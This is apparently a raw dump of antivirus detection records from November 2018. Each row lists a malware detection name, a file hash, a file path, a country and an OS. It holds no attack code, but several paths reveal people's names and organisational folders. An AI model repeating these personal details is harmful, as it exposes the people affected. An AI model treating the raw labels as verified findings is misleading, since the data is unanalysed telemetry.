  Row(detection=Row(filename='com.skycode.atrance.enfr.free.exe', filepath='G:\\Android\\data\\com.skycode.atrance.enfr.free.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (8).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (8).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T03:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r3.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\WASHIN SSS\\SSS2011\\WASHIN MARCH 2011\\R3.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='ebf30fe7ee8a3a484d7830a6bc6aa9b1d72653ac7ac74255a30c7e31c6e2822e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:53:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='office volume activation script for z.w.t keygen.rar', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Office 2010 (New) Professional Plus 32bit and 64bit with Volume Edition Activator_timesurfer\\Office Volume Activation Script for Z.W.T Keygen.rar', filesize=284000, name='BDS/Bot.140827.#M1.#R1'), hash='d8cc74b15b4bc6301d90d96b73b55f6ff459468ba2cb096e441539950ff20d8b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:41:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='theune_nina.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Theune_Nina.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='2119780e572b149cb5a78690492e3288648527eecf6d0e69f3d4974203223dca', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T17:23:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0009674.exe', filepath='E:\\System Volume Information\\_restore{69212C0F-784E-4A08-A5CD-0319A60006C2}\\RP6\\A0009674.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='6ad0c1f7a9f237dd660cc6b1a57a4eaee3062b8317e9ec04f5d41584c52ca28c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa10916.14787\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa10916.14787\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:49:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='batchb.exe', filepath='G:\\New folder (2)\\SAS\\sas\\20080620_2104\\Software Disk1\\sas\\reporter\\cmponent\\batch\\batchb.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='560f03e781ba65d04a128daf5c03af3c4e3d8368b658ed52cd34e592c69f02a7', metadata=Row(cmdline='\\\\\\/service', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Common Files\\Softwin\\BitDefender Scan Server\\bdss.exe', parentsize=81920, timestamp='2018-11-01T12:22:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:48:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\36A923DC3A8D30639F68EED2531E7D5052B4C7EA466EB591E6153E15B5EFF975', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:09:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:57:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='97118209678c62c9748dd7db96d3781ce6426a90', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\97118209678c62c9748dd7db96d3781ce6426a90', filesize=320000, name='HEUR/AGEN.1032111.#M1.#R1'), hash='1918e34d141ea008b732f2492308150328028082ce2863535d55fe4b0c9f696e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:13:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T19:38:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8390eaa14c3adc3776b49f3b632bd3d08c51e10c234f28aa045faa38a245d3ee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\8390EAA14C3ADC3776B49F3B632BD3D08C51E10C234F28AA045FAA38A245D3EE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8390eaa14c3adc3776b49f3b632bd3d08c51e10c234f28aa045faa38a245d3ee', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:49:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='G:\\$RECYCLE.BIN\\S-1-5-21-3221164867-1743615896-3438021022-1000\\$RGE98RI\\Lenovo_A7000A_Plus_MT6752_S308_160618\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='10b6edbe87cf84fd52909ea80ef28daf9826f1aa720bf0c0c213b064d20e1318', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:50:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:03:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eval_rech_sc_infir_maieutik_article_3.exe', filepath='D:\\eval_rech_sc_infir_maieutik_article_3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000ad16f', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000ad16f', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:50:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T13:33:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235946-3243b396', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_843a623b\\AVSCAN-20181101-235935-3028588C\\AVSCAN-20181101-235946-3243B396', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:59:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vskxibfg.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\vskxIBfg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename="idoneita'.exe", filepath="E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\IDONEITA'.exe", filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msyultks.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\MSYULTKS.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sorzi programmi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\SORZI PROGRAMMI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\lfpeuoawwn5\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539843432.5bc825683a740', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AZ\\499287.exe', parentsize=671232, timestamp='2018-11-01T07:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d3a557fa93d660dd05990aeee041a6d12af777edcff23ef0e6e09005563d9e47', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T08:12:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='33e5.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\33E5.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152355-4bbeb2aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152355-4BBEB2AA', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spideypc.exe', filepath='\\\\?\\F:\\الغاب\\Spider Man\\SpideyPC.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='f3799fb55c993984592672982c512275bcc4a97e2006fbf8ba1404c1b45429a8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:55:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095430-723c9d5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095430-723C9D5F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:54:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\rvkxowqmchz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1f3p5msfxyw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152159-893660f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152159-893660F8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='asa 581042.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\ASA 581042.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tecnico progettista di spazi verdi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\AGRICOLI\\TECNICO PROGETTISTA DI SPAZI VERDI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b2f92f1091280d1c613b1192394013e5869a4815f01d79ae3e7bbc29b3b74640', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\B2F92F1091280D1C613B1192394013E5869A4815F01D79AE3E7BBC29B3B74640', filesize=3328000, name='TR/Drop.Agent.rfutq.#M1.#R1'), hash='b2f92f1091280d1c613b1192394013e5869a4815f01d79ae3e7bbc29b3b74640', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:00:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dztoket1vdf\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194527-41761a54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194527-41761A54', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134449-f7eedaab', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134449-F7EEDAAB', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150426-bf759d16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150426-BF759D16', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093554-9c505ac0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093554-9C505AC0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='backup files 9.zip', filepath='\\\\?\\D:\\GAMER-PC-PC\\Backup Set 2017-03-28 010046\\Backup Files 2017-03-28 010046\\Backup files 9.zip', filesize=174068000, name='W2000M/Agent.248543.#M1.#R1'), hash='b521cd73bfe45ed9d5be8fb4f5b70cd94bfc68acb0fee2df5ab970f14f2d3a79', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:51:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-131235-1d55d2b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131235-1D55D2B1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130628-0193228d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130628-0193228D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:06:26Z'), dt=datetime.date(2018, 11, 4)),
